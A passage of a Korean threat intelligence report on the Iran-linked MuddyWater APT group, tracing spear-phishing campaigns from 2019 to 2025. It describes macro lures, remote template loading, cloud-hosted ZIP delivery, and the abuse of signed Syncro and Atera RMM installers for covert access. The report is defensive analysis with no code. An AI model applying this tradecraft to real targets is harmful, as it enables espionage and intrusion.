◈ 주요 결과 (Key Findings)
-
중동 지역은 국가 배후 APT 활동이 집중되는 전략적 사이버 위협 거점
-
중동발 공격은 단기 이익보다 장기 침투와 정보 수집을 핵심 목표로 함
-
RMM 악용과 매크로 기반 공격은 중동 APT의 주요 초기 침투 수단
-
사회공학 기법과 구버전 환경을 악용한 사용자 유도 공격이 지속 활용됨
-
경계 기반 탐지에는 한계가 있어 엔드포인트 행위 기반 EDR이 필수
1. 개요 (Overview)
중동 지역은 지정학적·군사적·에너지 안보 측면에서 전략적 중요성이 높은 지역으로, 다수의 국가 배후 사이버 위협 활동이 집중적으로 관측되는 환경으로 평가됩니다. 이러한 특성으로 인해 국가 차원의 정보 수집과 외교·안보 전략 수행을 목적으로 한 지속적 침투형 사이버 작전(APT)이 활발히 전개되고 있으며, 해당 활동은 중동 역내에 국한되지 않고 유럽, 아시아, 북미 등 글로벌 범위로 확산되는 양상을 보이고 있습니다.
중동발 사이버 안보 위협은 단발성 공격이나 금전적 이득보다는 장기적인 접근 유지, 정보 탈취, 영향력 확대를 핵심 목표로 삼는 경향이 강한 것으로 분석됩니다. 공격 대상 역시 정부 기관, 외교·국방 관련 조직, 에너지 및 통신 인프라 등 국가 핵심 기능과 직결된 분야에 집중되는 특징을 보입니다.
미국과 영국을 비롯한 여러 국가의 사이버 보안 기관은 이러한 중동 기반 위협 행위자들이 공격 초기 접근에 문서 기반 스피어피싱을 여전히 활용하고 있다는 점에 주목하고 있습니다.
최신 Microsoft Office 제품군은 기본적으로 인터넷에서 받은 문서의 매크로 실행을 차단하거나 강화된 보호 기능을 적용하지만, 공격자는 이메일 본문과 사회공학 기법을 결합해 사용자가 매크로 실행을 직접 허용하도록 유도하고 있으며, 구버전 소프트웨어가 널리 운영 중인 환경에서는 매크로 자동 실행이 그대로 활성화되어 있어 성공률이 상대적으로 높습니다.
또한 OLE 및 임베디드 기능을 악용해 페이로드를 숨기는 등의 문서 기반 위협은 여전히 전 세계적으로 공격자들이 자주 사용하는 벡터로 남아 있습니다. 이러한 환경과 정교한 피싱 메시지가 결합될 경우, 사용자 상호작용을 유도하는 문서 기반 초기 침투 방식은 여전히 효과적인 공격 수단으로 간주됩니다.
이러한 배경을 바탕으로 본 위협 인텔리전스 보고서는 중동 지역을 중심으로 활동하는 국가 배후 사이버 위협의 현재 양상을 분석하고, 실제 공격에서 활용되는 주요 전술과 기술적 특징을 체계적으로 정리하는 것을 목적으로 합니다.
본 보고서는 스피어피싱 기반 초기 침투, 문서형 악성 파일을 활용한 사용자 기만, 침투 이후의 지속성 확보 및 탐지 회피 기법 등 최근 관측되는 공격 흐름을 중심으로 중동 기반 사이버 위협의 현주소를 객관적으로 조망하고자 합니다.
아울러 이러한 위협 환경에서는 전통적인 경계 보안이나 시그니처 기반 탐지 방식만으로 공격 전반을 효과적으로 식별·차단하는 데 한계가 있는 것으로 평가됩니다. 이에 따라 본 보고서는 공격자의 행위 기반 탐지와 침해 이후의 가시성 확보 측면에서 EDR(Endpoint Detection and Response) 도입의 필요성을 함께 검토합니다.
EDR은 엔드포인트 단에서 발생하는 비정상 행위를 지속적으로 수집·분석함으로써, 중동 기반 APT 공격에서 반복적으로 활용되는 초기 침투 이후의 내부 확산(lateral movement), 스크립트 실행, 메모리 기반 악성 행위를 효과적으로 식별할 수 있는 대응 수단으로 평가됩니다.
궁극적으로 본 보고서는 중동 사이버 위협의 공격 전술과 기술적 진화를 이해하고, 이를 토대로 조직의 탐지·대응 역량을 실질적으로 강화하기 위한 기술적·운영적 시사점을 도출하는 데 목적이 있습니다.
2. 배경 (Background)
중동 지역에서 활동하는 국가 배후 사이버 위협 조직들은 대체로 정보기관 또는 준정부 성격 조직과 연계된 구조를 갖는 것으로 알려져 있습니다. 이들 조직은 외형상 독립적인 해킹 그룹의 형태를 취하고 있으나, 실제로는 국가 전략 목표 달성을 위한 정보 수집 및 사이버 작전 수행 주체로 활용되는 사례가 다수 확인되고 있습니다.
국제 보안 커뮤니티에서 통용되는 위협 조직의 명칭은, 해당 행위자가 스스로 사용하는 공식 명칭이 아니라 초기 침해 분석 과정에서 관측된 공격 인프라, 악성 도구, 캠페인 특성 및 내부 식별자를 기준으로 보안 분석가들이 부여한 분류명에서 유래하는 경우가 일반적입니다. 이러한 명칭은 위협 행위자의 활동을 체계적으로 구분하고 분석하기 위한 식별 수단으로 사용됩니다.
이 가운데 'MuddyWater'라는 명칭은 2017년 11월, Palo Alto Networks Unit 42 연구진이 발표한 Muddying the Water: Targeted Attacks in the Middle East 보고서에서 중동 지역을 대상으로 한 일련의 표적 공격 활동을 식별·분류하는 과정에서 처음 사용된 것으로 확인됩니다.
이후 해당 명칭은 다수의 보안 벤더 및 국가 보안 기관의 위협 인텔리전스(TI) 분석 보고서에서 동일한 위협 행위자를 지칭하는 용어로 채택되며 광범위하게 사용되어 왔습니다.
해당 위협 행위자는 공격 대상의 지리적·정치적 특성, 장기간 반복적으로 재사용되는 공격 인프라, 특정 시간대에 집중된 운영 패턴, 그리고 이란 기반 위협 행위자들과 중복되는 전술·기술·절차(TTPs) 등의 기술적 분석 결과를 근거로, 이란 정보안보부(MOIS)와 연계된 조직으로 평가됩니다. 이러한 판단은 단일 지표가 아닌, 다년간 축적된 캠페인 분석과 인프라 상관관계 분석 결과를 종합한 분석에 기반하고 있습니다.
명칭 자체는 '혼탁한 물'을 의미하며, 공격 흐름과 배후를 의도적으로 불명확하게 만드는 작전 특성을 상징적으로 표현한 것으로 해석되기도 합니다. 다만 이러한 명칭은 분석과 분류를 위한 편의적 식별자에 해당하며, 위협의 실질적인 본질은 특정 조직명보다는 국가 주도로 수행되는 지속적이고 체계적인 사이버 작전 역량과 운영 방식에 있습니다.
중동발 사이버 위협의 전반적인 공격 양상을 살펴보면, 초기 침투 단계에서는 스피어피싱 이메일이 가장 빈번하게 사용됩니다. 이 과정에서 Microsoft Word 문서를 포함한 오피스 문서 기반의 악성 파일은 2017년 최초 보고 시점부터 주요 전달 수단으로 활용되어 왔으며, Excel 매크로 문서 등 다양한 형식과 병행되어 사용되는 양상이 확인됩니다.
이들 문서는 정상 업무 문서나 공식 안내문 형태로 위장되어 사용자에게 콘텐츠 활성화 또는 매크로 실행을 유도하며, 이를 통해 추가 악성 페이로드를 설치하는 방식이 주로 관측됩니다.
침투 이후 단계에서는 PowerShell 기반 스크립트 실행, DLL 사이드로딩, 합법적인 원격 관리 도구의 악용 등 다양한 전술·기술·절차(TTPs)가 활용되며, 이를 통해 네트워크 내 장기적인 접근 유지와 보안 탐지 회피가 이루어집니다.
또한 일부 최근 공격 사례에서는 Rust 언어 기반 악성 코드가 사용된 정황도 포착되고 있으며, 이는 중동 지역 국가 배후 위협 행위자들의 악성 코드 개발 및 운영 역량이 지속적으로 고도화되고 있음을 시사합니다.
이러한 내용을 종합하면, 중동 사이버 위협은 단일 조직이나 개별 캠페인에 국한된 문제가 아니라 국가 전략 차원에서 장기간 축적·운영되는 위협 생태계로 이해할 필요가 있습니다. 따라서 개별 공격 사례 중심의 대응보다는, 공격 방식의 공통점과 기술적 진화 방향을 중심으로 위협을 분석하고 이에 기반한 선제적 탐지 및 대응 전략을 수립하는 접근이 요구됩니다.
3. MuddyWater APT 공격 연대기
3-1. 이라크 통신 인프라 공격 사례
최신 위협 동향을 보다 정확히 이해하기 위해서는 중동 지역 통신사를 대상으로 수행된 과거 APT 공격 사례를 사전에 살펴볼 필요가 있습니다. 이러한 선행 사례에 대한 검토는 공격자가 장기간에 걸쳐 추구해 온 전략적 목표와 전술적 변화 양상을 이해하는 데 중요한 배경지식을 제공합니다.
대표적인 사례로는 2019년 3월 11일 확인된 이라크 이동통신 사업자 대상 표적 공격이 있습니다. 해당 공격은 이라크 내 주요 통신 인프라를 운영하던 사업자를 겨냥해 수행되었으며, 조직 내부 사용자 환경에 대한 초기 접근 권한을 확보한 이후 장기적인 침투를 유지하는 것을 목표로 한 것으로 분석됩니다.
![[그림 3-1] 이라크 이동통신 사업자 대상 스피어피싱 공격 사례](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-1%5D%20%EC%9D%B4%EB%9D%BC%ED%81%AC%20%EC%9D%B4%EB%8F%99%ED%86%B5%EC%8B%A0%20%EC%82%AC%EC%97%85%EC%9E%90%20%EB%8C%80%EC%83%81%20%EC%8A%A4%ED%94%BC%EC%96%B4%ED%94%BC%EC%8B%B1%20%EA%B3%B5%EA%B2%A9%20%EC%82%AC%EB%A1%80.png?hsLang=ko)
[그림 3-1] 이라크 이동통신 사업자 대상 스피어피싱 공격 사례
이 통신사는 이라크 전역을 대상으로 이동통신 서비스를 제공하며, 기업과 정부 기관, 일반 개인 고객을 포함한 다양한 이용자를 보유하고 있었습니다. 이후 재정적·규제적 이슈로 인해 사업 구조와 서비스 범위에 일부 변화가 있었으나, 당시에는 국가 기간통신망의 한 축을 담당하는 주요 사업자 중 하나로 평가되었으며, 이러한 특성으로 인해 외부 위협 행위자에게 전략적 가치가 높은 표적으로 인식되었습니다.
공격 초기 단계에서는 전형적인 스피어 피싱 기반 침투 기법이 활용되었으며, 위협 행위자는 특정 내부 사용자를 대상으로 업무 관련 문서로 위장된 Microsoft Word 파일을 이메일로 전달해 수신자가 문서를 열고 매크로 실행을 허용하도록 유도한 것으로 분석됩니다. 이 과정에서 미끼 문서는 흐릿한 이미지를 삽입해 사용자가 매크로를 활성화하도록 속였고, 매크로가 실행된 이후에는 가짜 오류 메시지를 표시함으로써 사용자의 의심을 최소화하도록 설계된 정황이 확인됩니다.
![[그림 3-2] DOC 문서의 악성 매크로 허용 유도 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-2%5D%20DOC%20%EB%AC%B8%EC%84%9C%EC%9D%98%20%EC%95%85%EC%84%B1%20%EB%A7%A4%ED%81%AC%EB%A1%9C%20%ED%97%88%EC%9A%A9%20%EC%9C%A0%EB%8F%84%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 3-2] DOC 문서의 악성 매크로 허용 유도 화면
문서에 포함된 악성 매크로는 실행 직후 추가 악성 로직 호출과 난독화 해제 역할을 수행했으며, 최종 단계에서는 PowerShell을 이용해 백도어를 실행하는 구조로 구성되어 있었습니다.
이 PowerShell 기반 백도어는 C2 서버와 통신하며 원격 명령 실행, 추가 페이로드 다운로드, 감염 시스템 제어 기능을 제공함으로써 공격자가 내부 환경을 지속적으로 장악할 수 있도록 설계되어 있었습니다. 이러한 공격 흐름은 위협 행위자가 반복적으로 활용해 온 전술·기술·절차(TTP)와 일치하는 특징을 보이며, 특히 정상 관리 도구로 위장한 PowerShell 사용은 탐지 회피와 은밀한 장기 거점 확보에 효과적인 수단으로 작용했습니다.
이 사례는 단일 통신사를 대상으로 한 개별 공격에 그치지 않고, 중동 지역의 통신·에너지·정부 관련 조직을 지속적으로 노려온 일련의 공격 활동을 이해하는 데 중요한 참고 자료로 활용됩니다. 특히 통신 사업자가 보유한 고객 정보, 네트워크 운영 데이터, 정부 기관과의 연계성을 고려할 때, 이러한 공격 활동은 단순 정보 탈취를 넘어 전략적 정보 수집과 장기적 영향력 확보를 목적으로 수행되었을 가능성이 큽니다.
이와 같은 과거 공격 사례는 이후 등장하는 최신 공격 캠페인을 분석하는 과정에서 공격자의 목표 설정 방식, 초기 침투 전략, 악성 코드 활용 흐름을 비교·대조할 수 있는 기준점으로서 중요한 의미를 가집니다.
3-2. 요르단 소재 대학교 공격 사례
두 번째 공격 사례는 2019년 4월 8일, 요르단에 소재한 한 대학 소속 구성원을 대상으로 수행된 정교한 스피어피싱 공격이었습니다. 해당 공격은 대학을 표적으로 삼아 신뢰할 수 있는 정부 기관을 사칭하는 방식으로 이루어졌으며, 사회공학 기법을 활용한 초기 침투 시도가 공격의 핵심이었습니다.
공격자는 요르단 정부 기관인 '요르단 민사 등록 및 여권국(Civil Status and Passport Department, cspd.gov.jo)'을 사칭하여 이메일을 발송했으며, 이메일 제목은 "Students Migration Verification - Civil Status and passport Department" 형태였습니다. 이는 수신자가 해당 메시지를 실제 정부 기관에서 발송한 공식 행정 요청으로 인식하도록 유도하기 위한 위장 기법이었습니다.
![[그림 3-3] 요르단 소재 대학 겨냥 스피어피싱 사례](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-3%5D%20%EC%9A%94%EB%A5%B4%EB%8B%A8%20%EC%86%8C%EC%9E%AC%20%EB%8C%80%ED%95%99%20%EA%B2%A8%EB%83%A5%20%EC%8A%A4%ED%94%BC%EC%96%B4%ED%94%BC%EC%8B%B1%20%EC%82%AC%EB%A1%80.png?hsLang=ko)
[그림 3-3] 요르단 소재 대학 겨냥 스피어피싱 사례
이메일 본문에는 CSPD의 요청에 따라 일부 학생들이 이주(Migration) 관련 정보를 확인해야 한다는 내용이 포함되어 있었으며, 첨부된 문서를 확인한 후 해당 학생들에게 신속히 안내해 달라는 문구가 사용되었습니다. 이러한 구성은 대학 행정 담당자의 업무 특성과 책임 범위를 정교하게 반영한 것으로, 수신자가 의심 없이 첨부파일을 열람하도록 유도하는 사회공학적 설계였습니다.
첨부파일은 정상적인 학생 관련 내용으로 위장한 Microsoft Word 문서 형태였으며, 내부에는 악성 매크로 코드가 포함되어 있었습니다. 해당 문서는 사용자가 콘텐츠 사용을 허용할 경우 매크로가 실행되도록 구성되어 있었고, 실행 이후에는 추가 악성 페이로드를 로드하거나 공격자가 통제하는 원격 인프라와 통신을 시도하는 방식이었습니다.
특히 문서 내부의 OpenXML 관계 정의를 통해 외부에 호스팅된 템플릿을 참조하도록 설정되어 있었으며, attachedTemplate 관계를 이용해 공격자가 제어하는 원격 URL에서 템플릿 파일을 로드하는 구조를 사용하였습니다. 이 외부 템플릿은 문서 열람 시 자동으로 로드되어, 매크로 실행 이전 또는 이후 단계에서 추가적인 악성 코드 전달 경로로 활용될 수 있습니다. 이는 사용자 행위를 직접적인 트리거로 활용하는 전형적인 문서 기반 초기 침투 방식이자, 보안 탐지를 우회하기 위한 간접 로딩 기법입니다.
![[그림 3-4] DOC 문서의 악성 매크로 허용 유도 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-4%5D%20DOC%20%EB%AC%B8%EC%84%9C%EC%9D%98%20%EC%95%85%EC%84%B1%20%EB%A7%A4%ED%81%AC%EB%A1%9C%20%ED%97%88%EC%9A%A9%20%EC%9C%A0%EB%8F%84%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 3-4] DOC 문서의 악성 매크로 허용 유도 화면
악성 문서에 포함된 VBA 스크립트는 PowerShell 명령을 호출하는 역할을 수행했으며, 이를 통해 백도어 설치, 감염 시스템 정보 수집, 원격 명령 실행과 같은 후속 행위가 가능하도록 설계되어 있었습니다. 외부 템플릿 호출 기법은 문서 자체의 정적 분석을 어렵게 만들고, 실제 악성 로직을 원격 리소스에 분리함으로써 공격 인프라 교체 및 페이로드 변경을 유연하게 수행할 수 있다는 장점이 있습니다. 이러한 공격 흐름은 문서 기반 사회공학 기법, 외부 템플릿 로딩, 그리고 스크립트 실행을 결합한 구조로, 다단계 침투를 염두에 둔 공격 체계의 일환으로 분석됩니다.
본 공격에서 교육 기관이 표적으로 선택된 점은 공격자가 단순한 개별 사용자 감염이 아닌, 보다 넓은 네트워크 접근을 목표로 했음을 시사합니다. 대학과 같은 교육 기관은 정부 부처, 연구 기관, 공공 프로젝트와 직·간접적으로 연계된 경우가 많으며, 이를 통해 공격자는 추가적인 정보 자산 접근이나 후속 침투 경로를 확보할 수 있습니다. 이러한 특성으로 인해 본 공격은 단기적인 악성코드 유포보다는 중장기적인 정보 수집 및 내부 거점 확보를 목적으로 한 전략적 공격으로 해석됩니다.
또한 본 사례에서 확인된 공격 흐름은 초기 침투 이후의 지속성 확보와 확장 가능성을 염두에 둔 구조였습니다. PowerShell을 활용한 후속 명령 실행, 원격 제어 인프라와의 통신 가능성, 추가 도구 설치 여지 등은 공격자가 장기간에 걸쳐 내부 환경을 관찰하고 통제할 수 있도록 설계된 특징으로 판단됩니다.
종합적으로 본 사례는 정부 기관을 사칭한 이메일을 통해 교육 기관 구성원의 신뢰를 악용하고, 악성 문서 실행을 기점으로 내부 침투를 시도하는 고도화된 스피어피싱 공격의 전형적인 사례입니다. 이는 이메일 기반 공격이 여전히 표적형 공격에서 효과적인 초기 접근 수단으로 활용되고 있음을 보여주며, 특히 행정적·공식적 요청으로 위장된 메시지가 조직 내부에서 높은 성공 가능성을 가질 수 있음을 시사합니다.
3-3. 이집트 호스팅, 이스라엘 보험, 말레이시아 연금 분야 공격 사례
앞서 언급한 스피어피싱 공격 사례는 주로 MS Word 기반의 악성 문서를 활용한 방식이었습니다. 그러나 2022년 4분기부터 2023년 2분기 사이에는 공격 기법에 변화가 관찰되었으며, 악성 HTML 파일 또는 Dropbox URL 링크 삽입 방식이 사용되었습니다.
해당 공격에서 사용된 HTML 파일은 실행 시 내부에 포함된 URL을 통해 이메일 수신자의 추가 동작을 유도하며, 최종적으로 Microsoft OneDrive 주소로 연결되었습니다. 이후 수신자는 악성 ZIP 파일을 다운로드하도록 유도되었습니다.
이 과정에서 위협 행위자는 Dropbox 및 OneDrive와 같은 합법적인 클라우드 저장소 서비스를 중간 유포 경로로 활용함으로써, 보안 솔루션 및 사용자의 경계심을 우회하는 전략을 사용하였습니다.
이와 같은 기법은 정상 서비스 도메인을 악용함으로써 URL 평판 기반 탐지를 회피하고, 사회공학적 신뢰도를 높이는 데 목적이 있습니다.
![[그림 3-5] HTML 첨부 및 URL 링크 포함형 스피어피싱 공격 사례](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-5%5D%20HTML%20%EC%B2%A8%EB%B6%80%20%EB%B0%8F%20URL%20%EB%A7%81%ED%81%AC%20%ED%8F%AC%ED%95%A8%ED%98%95%20%EC%8A%A4%ED%94%BC%EC%96%B4%ED%94%BC%EC%8B%B1%20%EA%B3%B5%EA%B2%A9%20%EC%82%AC%EB%A1%80.png?hsLang=ko)
[그림 3-5] HTML 첨부 및 URL 링크 포함형 스피어피싱 공격 사례
2022년 10월, 공격자는 이집트 소재 데이터 호스팅 및 IT 인프라 서비스 제공 기업을 표적으로, 호스팅 서비스 문의로 위장한 스피어피싱 공격을 수행했습니다. 해당 공격은 실제 고객 문의와 유사한 형식을 사용해 수신자의 경계심을 낮추는 사회공학 기법이 활용된 것으로 분석되었습니다.
이어 2022년 11월에는 이스라엘 소재 3개 보험사를 동시에 타깃으로 삼아, 특정 단일 조직에 국한되지 않고 보험 업계 전반을 대상으로 한 캠페인형 공격 양상을 보였습니다. 이는 공격 범위를 확장해 동일 산업군 내 다수의 조직을 연속적으로 노린 시도로 판단되었습니다.
또한 2023년 4월에는 말레이시아 정부 산하 공공 연금기금 관리 기관 소속 인물을 대상으로 한 공격이 확인되었습니다.
주목할 만한 점은, 이 공격에 사용된 악성 HTML 첨부파일이 2022년 11월 이스라엘 보험업계 공격에 사용된 것과 동일한 파일이었다는 점입니다.
이를 통해 위협 행위자는 악성파일을 재사용하며, 보험 및 연금 분야 종사자를 주요 표적으로 수개월에 걸쳐 지속적인 공격 활동을 수행해 온 것으로 확인되었습니다.
![[그림 3-6] 악성 HTML 실행 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-6%5D%20%EC%95%85%EC%84%B1%20HTML%20%EC%8B%A4%ED%96%89%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 3-6] 악성 HTML 실행 화면
HTML 파일을 실행하면, 이스라엘 텔아비브에 본사를 둔 대형 호텔 체인 기업의 공식 웹사이트에서 제공하는 다운로드 페이지처럼 보이는 화면이 나타납니다.
하지만 이는 정상 페이지가 아니라, OneDrive로 연결된 링크로 이어지며, 최종적으로 악성 'Looking for business insurance no335080.2022-isrotel.zip' 압축 파일을 내려받도록 유도하는 방식으로 구성되어 있습니다.
![[그림 3-7] 다운로드된 압축 파일과 내부에 포함된 MSI 파일](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-7%5D%20%EB%8B%A4%EC%9A%B4%EB%A1%9C%EB%93%9C%EB%90%9C%20%EC%95%95%EC%B6%95%20%ED%8C%8C%EC%9D%BC%EA%B3%BC%20%EB%82%B4%EB%B6%80%EC%97%90%20%ED%8F%AC%ED%95%A8%EB%90%9C%20MSI%20%ED%8C%8C%EC%9D%BC.png?hsLang=ko)
[그림 3-7] 다운로드된 압축 파일과 내부에 포함된 MSI 파일
내부에 포함되어 있던 'Looking for business insurance no335080.2022-isrotel.msi' 파일은 Syncro MSI 설치 프로그램 입니다.
Syncro는 미국을 본사로 하는 Servably사가 제공하는 합법적인 RMM(Remote Monitoring and Management) 기반 IT 관리 플랫폼으로, 주로 MSP(Managed Service Provider) 및 기업 내부 운영팀이 조직 내 IT자산을 원격으로 관리하는 데 사용됩니다.
해당 솔루션은 일정 기간 기능 제한이 거의 없는 평가판을 제공하며, 자체적으로는 악성 프로그램에 해당하지 않습니다. Syncro는 고객 ID가 포함된 맞춤형 MSI 에이전트를 통해 관리 대상을 식별하며, 에이전트가 설치된 시스템은 웹 기반 관리 콘솔에서 중앙 제어됩니다.
이를 통해 원격 명령 실행, 상태 모니터링 등 다양한 관리 기능이 제공됩니다.
![[그림 3-8] 고객 API KEY 및 ID 값이 포함된 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-8%5D%20%EA%B3%A0%EA%B0%9D%20API%20KEY%20%EB%B0%8F%20ID%20%EA%B0%92%EC%9D%B4%20%ED%8F%AC%ED%95%A8%EB%90%9C%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 3-8] 고객 API KEY 및 ID 값이 포함된 화면
![[그림 3-9] 주요 값을 확인하는 내부 명령어](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-9%5D%20%EC%A3%BC%EC%9A%94%20%EA%B0%92%EC%9D%84%20%ED%99%95%EC%9D%B8%ED%95%98%EB%8A%94%20%EB%82%B4%EB%B6%80%20%EB%AA%85%EB%A0%B9%EC%96%B4.png?hsLang=ko)
[그림 3-9] 주요 값을 확인하는 내부 명령어
특히 에이전트가 설치된 시스템에는 SYSTEM 권한의 원격 터미널, 원격 데스크톱 접근, 전체 파일 시스템 제어, 작업 및 서비스 관리 등 강력한 관리 기능이 활성화됩니다. 이러한 기능은 정상적인 운영 환경에서는 유용하지만, 악용될 경우 보안상 높은 위험 요소로 작용합니다.
문제는 이러한 기능이 정상적으로 서명된 MSI 설치 파일 형태로 배포된다는 점입니다. 위협 행위자는 이를 악용해 합법적인 Syncro 에이전트 MSI 파일을 생성한 뒤, 스피어피싱 메일의 첨부파일이나 다운로드 링크로 유포하여 초기 침투 수단으로 활용할 수 있습니다. 에이전트 설치에 성공할 경우, 별도의 악성코드 없이도 지속적인 원격 접근 권한 확보가 가능합니다.
이후 공격자는 해당 접근 권한을 이용해 내부 정찰, 추가 페이로드 배포, 정보 유출, 접근 권한 공유 등 후속 공격을 단계적으로 수행할 수 있습니다. 이와 같이 합법적인 관리 도구가 악용되는 경우, 행위가 정상 관리 트래픽과 유사해 탐지 회피 가능성이 높고, 침해가 장기화될 위험이 큽니다.
3-4. 이스라엘 소재 대학교 공격 사례
2024년 4월, 이스라엘 소재의 한 대학교를 대상으로 악성 파일 유포 공격이 확인되었습니다. 교수진과 학생 등으로 추정되는 총 27개의 학내 이메일 계정이 수신자로 지정된 것으로 파악되었습니다.
해당 공격은 수신 대학과는 다른 이스라엘 소재 대학교의 공식 이메일 계정을 발신자로 사용해 수행되었습니다.
위협 행위자는 수신 대학의 공식 이메일 도메인을 사용하는 다수의 개인 계정을 동시에 지정해 악성 파일을 전달했으며, 이는 불특정 다수를 대상으로 한 무차별 유포가 아니라 특정 교육기관 내부 구성원을 명확히 겨냥한 표적형 캠페인 공격의 성격을 보입니다.
![[그림 3-10] 특정 이스라엘 대학교를 대상으로 수행된 공격](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-10%5D%20%ED%8A%B9%EC%A0%95%20%EC%9D%B4%EC%8A%A4%EB%9D%BC%EC%97%98%20%EB%8C%80%ED%95%99%EA%B5%90%EB%A5%BC%20%EB%8C%80%EC%83%81%EC%9C%BC%EB%A1%9C%20%EC%88%98%ED%96%89%EB%90%9C%20%EA%B3%B5%EA%B2%A9.png?hsLang=ko)
[그림 3-10] 특정 이스라엘 대학교를 대상으로 수행된 공격
첨부 파일로는 'digitalform.rar'라는 이름의 암호화된 압축 파일이 포함되어 있으며, 해당 압축 파일에는 비밀번호(123456)가 설정되어 있습니다. 비밀번호 정보는 이메일 본문에 함께 안내되어 있어 수신자가 별도의 확인 없이 압축을 해제할 수 있도록 유도합니다.
이와 같이 암호화된 압축 파일을 사용하는 방식은 메일 보안 솔루션이 내부 파일을 정적으로 분석하거나 악성 여부를 탐지하고 차단하는 것을 우회하기 위한 전형적인 회피 기법입니다.
압축 파일 내부에는 'digitalform.msi'라는 Windows Installer 패키지 파일이 포함되어 있으며, 해당 파일의 디지털 서명에는 Atera Networks 이름이 확인됩니다.
Atera Networks는 이스라엘에 본사를 둔 글로벌 관리 소프트웨어 기업으로, MSP 및 기업 내부 IT 부서를 대상으로 RMM 기반의 원격 관리 플랫폼을 제공하는 정상 업체입니다. 해당 플랫폼은 본래 시스템 관리와 운영 효율화를 목적으로 사용됩니다.
앞서 언급한 바와 같이, 위협 행위자는 Syncro와 Atera 등 합법적인 IT 관리 도구를 초기 침투 수단으로 악용하는 사례가 확인되었습니다. 정상적으로 서명된 설치 파일을 배포함으로써 보안 솔루션의 탐지를 회피하고, 별도의 악성코드 실행 없이도 대상 시스템에 대한 지속적인 원격 접근 권한을 확보하려는 시도가 관찰됩니다.
이러한 접근 방식은 정상 관리 트래픽과 거의 구분이 불가능해, 침해 사실을 장기간 은폐할 수 있다는 점에서 주의가 필요합니다.
또한, 이번 위협 행위자는 Syncro와 Atera 외에도 Remote Utilities, ScreenConnect, SimpleHelp, N Able 등 다양한 원격 관리 도구를 공격에 활용한 것으로 알려져 있습니다.
![[그림 3-11] digitalform.msi 파일의 속성](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-11%5D%20digitalform.msi%20%ED%8C%8C%EC%9D%BC%EC%9D%98%20%EC%86%8D%EC%84%B1.png?hsLang=ko)
[그림 3-11] digitalform.msi 파일의 속성
'digitalform.msi' 인스톨러 파일은 설치 과정에서 내부에 포함된 계정 정보 및 식별자(ID)를 이용하여 Atera 원격 관리 단말기와 통신을 수행합니다.
![[그림 3-12] Atera 식별자 정보](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-12%5D%20Atera%20%EC%8B%9D%EB%B3%84%EC%9E%90%20%EC%A0%95%EB%B3%B4.png?hsLang=ko)
[그림 3-12] Atera 식별자 정보
인스톨러 설치가 완료되면, 위협 행위자는 Atera RMM이 제공하는 정상 기능을 통해 피해 시스템에서 명령 실행, 파일 업로드 및 다운로드, 시스템 모니터링 등 다양한 원격 관리 작업을 수행할 수 있습니다.
추가적으로 하기와 같은 타사 원격 제어 도구를 실행할 수 있는 환경을 구성할 수 있습니다.
-
Splashtop (Free)
-
AnyDesk (Free)
-
TeamViewer
-
ScreenConnect
![[그림 3-13] Atera 디바이스 관리 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-13%5D%20Atera%20%EB%94%94%EB%B0%94%EC%9D%B4%EC%8A%A4%20%EA%B4%80%EB%A6%AC%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 3-13] Atera 디바이스 관리 화면
이처럼 MuddyWater APT 그룹은 합법적인 RMM 서비스에 정상 절차로 가입한 뒤, 해당 플랫폼에서 제공하는 에이전트 모듈을 초기 침투 단계에 활용하는 특성을 보입니다.
이들은 악성코드를 직접 배포하는 대신, 정상적으로 서명된 RMM 설치 파일을 피싱 이메일 첨부파일 또는 다운로드 링크 형태로 유포하여 피해 시스템에 설치를 유도합니다. 해당 에이전트는 공식 RMM 인프라와 통신하며 단말을 원격 관리 환경에 등록하게 되며, 이를 통해 공격자는 별도의 추가 페이로드 실행 없이도 지속적인 원격 접근 권한을 확보합니다.
이 과정에서 발생하는 네트워크 트래픽과 프로세스 행위는 정상적인 IT 관리 활동과 동일한 패턴을 보이기 때문에, 전통적인 시그니처 기반 보안 탐지 체계를 우회하는 데 효과적입니다. 초기 접근 이후에는 RMM 기능을 활용해 추가 도구 배포, 명령 실행, 정보 수집 및 lateral movement를 단계적으로 수행하는 것이 가능합니다.
이러한 접근 방식은 공격 인프라 구축 비용을 낮추는 동시에, 침해 행위를 정상 관리 활동으로 위장함으로써 탐지 지연 및 분석 난이도를 크게 증가시키는 전략으로 평가됩니다.
3-5. 오만 기관 사칭, 다국적 외교부·국제기구 대상 공격 사례
2025년 8월 19일 확인된 스피어피싱 공격 시도는 오만 외교 기관의 공식 행사 초청을 위장한 첨부파일 기반 표적형 피싱 메일에 해당합니다.
![[그림 3-14] 오만 외교 기관 행사 초청 위장 공격 화면](https://www.genians.co.kr/hubfs/%5B%EA%B7%B8%EB%A6%BC%203-14%5D%20%EC%98%A4%EB%A7%8C%20%EC%99%B8%EA%B5%90%20%EA%B8%B0%EA%B4%80%20%ED%96%89%EC%82%AC%20%EC%B4%88%EC%B2%AD%20%EC%9C%84%EC%9E%A5%20%EA%B3%B5%EA%B2%A9%20%ED%99%94%EB%A9%B4.png?hsLang=ko)
[그림 3-14] 오만 외교 기관 행사 초청 위장 공격 화면
